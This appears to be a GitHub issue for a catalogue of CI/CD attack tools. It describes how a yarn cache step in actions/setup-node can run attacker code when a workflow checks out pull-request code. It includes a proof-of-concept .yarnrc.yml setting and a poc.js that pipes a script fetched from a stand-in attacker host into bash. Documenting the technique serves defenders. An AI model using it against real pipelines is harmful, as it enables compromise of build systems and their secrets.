lotp
lotp copied to clipboard
Published
20 hours ago •
boostsecurityio
boostsecurityio
[LOTP] Add `actions/setup-node`
Description of the LOTP tool
actions/setup-node is used to setup a node environment. It supports a cache flag which calls npm or yarn under the hood in order to cache dependencies.
I haven't fully analyzed this, but have validated the yarn case on a disclosure that is currently in progress.
If an attacker sees a workflow that checks out PR code and has the following:
- name: Use Node.js 20
uses: actions/setup-node@v4
with:
node-version: '20'
cache: yarn
Then they can simply set the yarnPath config field in the .yarnrc.yml file from their fork and point it to a simple payload javascript file, like so:
yarnPath: "./poc.js"
const { exec } = require('child_process');
// Execute the bash command
exec('bash -c "curl -sSfL attacker-payload.com/payload.sh | bash"', (error, stdout, stderr) => {
if (error) {
console.error(`Error: ${error.message}`);
return;
}
if (stderr) {
console.error(`stderr: ${stderr}`);
return;
}
// Output the result
console.log(`stdout: ${stdout}`);
});
Configuration files
.yarnrc.yml
Documentation
https://yarnpkg.com/configuration/yarnrc
Real-world example
Pending :)
